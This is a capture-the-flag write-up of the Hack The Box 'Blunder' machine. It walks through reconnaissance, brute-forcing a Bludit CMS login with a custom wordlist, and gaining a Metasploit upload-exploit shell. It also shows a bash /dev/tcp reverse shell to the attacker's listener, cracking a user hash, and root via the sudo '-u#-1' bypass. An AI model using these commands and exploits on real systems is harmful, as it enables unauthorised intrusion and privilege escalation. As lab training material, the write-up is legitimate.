██╗ ██╗███████╗███████╗██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║███████╗█████╗ ██████╔╝ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ╚██████╔╝███████║███████╗██║ ██║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝
root@nidus:/git/htb/cache# nmap -Pn -sC -sV -n 10.10.10.191 PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: Blunder |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts
DIRB:
- http://10.10.10.191/0 (CODE:200|SIZE:7562)
- http://10.10.10.191/about (CODE:200|SIZE:3281) ==> DIRECTORY: http://10.10.10.191/admin/
- http://10.10.10.191/cgi-bin/ (CODE:301|SIZE:0)
- http://10.10.10.191/LICENSE (CODE:200|SIZE:1083)
- http://10.10.10.191/robots.txt (CODE:200|SIZE:22)
- http://10.10.10.191/server-status (CODE:403|SIZE:277)
NIKTO:
- “robots.txt” contains 1 entry which should be manually viewed.
FFUF dirb/common.txt (.php, .html, .txt): install.php [Status: 200, Size: 30, Words: 5, Lines: 1] robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2] todo.txt [Status: 200, Size: 118, Words: 20, Lines: 5]
Looking at the webpage we find nothing really of use. Dirb gives us a login under /admin, however we don’t have any creds. install.php only says that Bludit is already installed robots.txt hows nothing todo.txt however gives us something;
-Update the CMS -Turn off FTP - DONE -Remove old users - DONE -Inform fergus that the new blog needs images - PENDING
My conclusion from this - CMS is old version, and there are probably a user named fergus.
Looking through the source code of the webpage we find that the software version is 3.9.2.
Looking for vulnerabilities in Bludit 3.9.2 we find a page and a script to bypass brute force protection. https://medium.com/@musyokaian/bludit-cms-version-3-9-2-brute-force-protection-bypass-283f39a84bbb
Enter found username (fergus), along with the url and standard wordlist rockyou.txt - no dice. We’re missing something here the password doesn’t seem the be a default from rockyou.txt.
Using cewl we can try to create our own, custom, wordlist. root@nidus:/git/htb/blunder# cewl -w blunder-wl.txt -d 4 -m 5 http://10.10.10.191 root@nidus:/git/htb/blunder# cat brute.py #!/usr/bin/env python3 import re import requests
host = "http://10.10.10.191" # change to the appropriate URL
login_url = host + '/admin/'
username = 'fergus' # Change to the appropriate username
fname = "blunder-wl.txt" #change this to the appropriate file you can specify the full path to the file
..
root@nidus:/git/htb/blunder# python3 brute.py
..
[*] Trying: RolandDeschain
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
We are now able to access /admin. Continue to enumerate for Bludit 3.9.2 vulns and we find a Code Execution vuln in the upload function.
https://github.com/bludit/bludit/issues/1081 I tried to get this exploit to work manually, however I wasn’t able to. So instead I went to the msf module ‘linux/http/bludit_upload_images_exec’ that gave a reverse meterpreter shell right away.
msf5 exploit(linux/http/bludit_upload_images_exec) > options
Module options (exploit/linux/http/bludit_upload_images_exec):
Name Current Setting Required Description ---- --------------- -------- ----------- BLUDITPASS RolandDeschain yes The password for Bludit BLUDITUSER fergus yes The username for Bludit Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.191 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path for Bludit VHOST no HTTP server virtual host
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 10.10.14.17:4488 [+] Logged in as: fergus [*] Retrieving UUID… [*] Uploading umtMhoBAyo.png… [*] Uploading .htaccess… [*] Executing umtMhoBAyo.png… [*] Sending stage (38288 bytes) to 10.10.10.191 [*] Meterpreter session 1 opened (10.10.14.17:4488 -> 10.10.10.191:53692) at 2020-06-04 17:53:55 +0200 [+] Deleted .htaccess
meterpreter > shell Process 4654 created. Channel 1 created. whoami www-data
Looking around in the box we find 2 hashed passwords in /var/www/bludit-3.9.2/bl-content/databases, however we are unable to crack them. Enumerating further we find their new, updated version bludit 3.10 directory. Browsing to the database dir we find a new user hash.
pwd /var/www/bludit-3.10.0a/bl-content/databases cat users.php { “admin”: { “nickname”: “Hugo”, “firstName”: “Hugo”, “lastName”: ““,”role”: “User”, “password”: “faca404fd5c0a31cf1897b823c695c85cffeb98d”,
rockyou.txt doesn’t contain the password, so using crackstation.net solved it for us - Password120
su hugo Password: Password120 whoami hugo cat /home/hugo/user.txt 7648136cd484168abf3ba60f6687fe65
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██████╗ ██████╗ ██████╗ ████████╗ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██████╔╝██║ ██║██║ ██║ ██║ ██╔══██╗██║ ██║██║ ██║ ██║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
The reverse meterpreter shell won’t allow us to execute ‘sudo -l’, so start by creating a new reverse shell - and upgrade it.
bash -i >& /dev/tcp/10.10.14.17/4488 0>&1 root@nidus:/git/htb/blunder# nc -lvnp 4488 listening on [any] 4488 … connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 54502 bash: cannot set terminal process group (1093): Inappropriate ioctl for device bash: no job control in this shell hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ sudo -l Password: Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User hugo may run the following commands on blunder: (ALL, !root) /bin/bash
A quick google on ‘(ALL, !root) /bin/bash’ shows us that we can escalate privs using ‘sudo -u#-1 /bin/bash’
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ sudo -u#-1 /bin/bash root@blunder:/var/www/bludit-3.10.0a/bl-content/databases# whoami root root@blunder:/var/www/bludit-3.10.0a/bl-content/databases# cat /root/root.txt 4f812395afcaa35870cc99487a7ef108
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██╗███╗ ██╗███████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ██║████╗ ██║██╔════╝██╔═══██╗██╔══██╗████╗ ████║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██╔████╔██║███████║ ██║ ██║██║ ██║██╔██╗ ██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║╚██╔╝██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ██║██║ ╚████║██║ ╚██████╔╝██║ ██║██║ ╚═╝ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝